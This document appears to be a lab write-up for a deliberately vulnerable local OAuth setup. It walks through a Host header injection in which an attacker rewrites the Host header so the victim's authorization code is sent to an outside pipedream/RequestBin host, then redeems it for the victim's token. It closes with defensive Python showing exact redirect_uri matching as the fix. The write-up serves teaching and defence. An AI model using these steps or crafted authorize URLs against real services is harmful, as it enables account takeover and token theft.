This exercise exploits a Host header injection vulnerability in the OAuth client. The goal is to obtain an access token tied to the victim's account.
```sh
$ git clone https://github.com/melonattacker/oauth-exploit-lab.git
$ cd oauth-exploit-lab/exercise/ex3
$ docker-compose up -d
```
| target | URL |
|---|---|
| client | http://localhost:10000 |
| authorization server | http://localhost:10001 |

| username | password |
|---|---|
| bob (attacker) | hoge |
| tom (victim) | huga |
Looking at line 89 of client/app.py, you can see that redirect_uri is generated from the Host header of the incoming request rather than from the registered redirect URI:

```python
authorize_url: str = build_url(auth_server['authorization_endpoint'], {
    'response_type': 'code',
    'client_id': client['client_id'],
    # 'redirect_uri': client['redirect_uris'][0],
    'redirect_uri': 'http://' + request.host + '/callback',
    'state': state,
    'scope': client['scope']
})
```

You can also see that the authorization server's verification of redirect_uri has been commented out, so any value is accepted:

```python
# if request.args.get('redirect_uri') not in client['redirect_uris']:
#     print('Mismatched redirect URI, expected %s but got %s' % (client['redirect_uris'], request.args.get('redirect_uri')))
#     return render_template('error.html', error='Invalid redirect URI')
```

Together these make the client vulnerable to Host header injection. To exploit it, the attacker starts the authorization flow under his own account, rewrites the Host header to a server he controls so that redirect_uri points there too, and then gets the victim to open the resulting authorization URL.
First, log in as bob (attacker) and click the Get OAuth Token button. Intercept the request with Burp Suite and rewrite the Host header to the attacker's server (in this example, a RequestBin endpoint). Forward the request; the client answers with a redirect to the authorization server in which redirect_uri now points at the attacker's host. Copy the URL of that GET /authorize request, then drop it:

```
/authorize?response_type=code&client_id=oauth-client-1&redirect_uri=http%3A%2F%2Feoxnypfvopbmt6n.m.pipedream.net%2Fcallback&state=Y446M2F8OW97SMRX7NF8UXI4ZCHMNF73&scope=hoge+huga
```

Then log in as tom (victim) and open the following URL, which is the copied request sent to the authorization server:

```
http://localhost:10001/authorize?response_type=code&client_id=oauth-client-1&redirect_uri=http%3A%2F%2Feoxnypfvopbmt6n.m.pipedream.net%2Fcallback&state=Y446M2F8OW97SMRX7NF8UXI4ZCHMNF73&scope=hoge+huga
```

Approving the client sends an authorization code to the attacker's server, because that is where redirect_uri points.

Log in as bob (attacker) again and open the client's callback with the code that arrived at the attacker's server (here JSKKNENI) and the original state value; the client exchanges it for an access token:

```
http://localhost:10000/callback?code=JSKKNENI&state=Y446M2F8OW97SMRX7NF8UXI4ZCHMNF73
```

Press the Get Protected Resource button: the client now shows tom's resources, because the token was issued for tom's authorization.
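As an added example (not code from oauth-exploit-lab), the following Python reproduces the Host-derived redirect_uri construction shown above beside the two fixes: the client using its registered redirect URI, and the authorization server comparing the requested redirect_uri exactly against its registered list. The client registration, the endpoint constant and the function names are assumptions for illustration; check_authorize_request also triages a captured /authorize URL such as the one intercepted in Burp above.

```python
"""
Added example, not code from oauth-exploit-lab: the vulnerable redirect_uri
construction next to the client-side and server-side fixes. The registration
below and all names are illustrative assumptions.
"""
from urllib.parse import urlencode, urlsplit, parse_qs

AUTHORIZATION_ENDPOINT = "http://localhost:10001/authorize"

# Constructed stand-in for the authorization server's client registration.
# The lab registers oauth-client-1; the exact redirect URI list is assumed.
CLIENT_REGISTRATION = {
    "client_id": "oauth-client-1",
    "redirect_uris": ["http://localhost:10000/callback"],
    "scope": "hoge huga",
}


def build_url(base, params):
    return base + "?" + urlencode(params)


def vulnerable_authorize_url(host_header, state):
    """Mirrors client/app.py: redirect_uri is derived from the request's Host
    header, so whoever controls that header controls where the code goes."""
    return build_url(AUTHORIZATION_ENDPOINT, {
        "response_type": "code",
        "client_id": CLIENT_REGISTRATION["client_id"],
        "redirect_uri": "http://" + host_header + "/callback",
        "state": state,
        "scope": CLIENT_REGISTRATION["scope"],
    })


def fixed_authorize_url(state):
    """Client-side fix: take redirect_uri from configuration, never from the
    request (this is the line commented out in the lab's client)."""
    return build_url(AUTHORIZATION_ENDPOINT, {
        "response_type": "code",
        "client_id": CLIENT_REGISTRATION["client_id"],
        "redirect_uri": CLIENT_REGISTRATION["redirect_uris"][0],
        "state": state,
        "scope": CLIENT_REGISTRATION["scope"],
    })


def redirect_uri_allowed(registration, requested):
    """Authorization-server-side fix: simple string comparison against the
    registered list, as RFC 6749 section 3.1.2.3 requires. No prefix, substring
    or hostname-only matching; those variants are bypassable."""
    return requested in registration["redirect_uris"]


def check_authorize_request(url):
    """Triage a captured /authorize URL. Returns (allowed, redirect_uri).
    A missing or duplicated redirect_uri parameter is rejected outright."""
    values = parse_qs(urlsplit(url).query).get("redirect_uri", [])
    if len(values) != 1:
        return False, None
    redirect_uri = values[0]
    return redirect_uri_allowed(CLIENT_REGISTRATION, redirect_uri), redirect_uri


if __name__ == "__main__":
    state = "Y446M2F8OW97SMRX7NF8UXI4ZCHMNF73"
    cases = [
        ("honest", vulnerable_authorize_url("localhost:10000", state)),
        ("poisoned", vulnerable_authorize_url("eoxnypfvopbmt6n.m.pipedream.net", state)),
        ("fixed", fixed_authorize_url(state)),
    ]
    for label, url in cases:
        allowed, uri = check_authorize_request(url)
        print(f"{label:8s} redirect_uri={uri} allowed={allowed}")
```

Both fixes are needed: the client fix stops this particular injection, and the server-side exact match stops any other way an attacker finds to influence redirect_uri. As defence in depth, the token endpoint should also require the redirect_uri sent with the code exchange to be identical to the one used in the authorization request (RFC 6749 section 4.1.3); in this lab that would make a code issued for the RequestBin redirect_uri unredeemable through the client's legitimate /callback.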


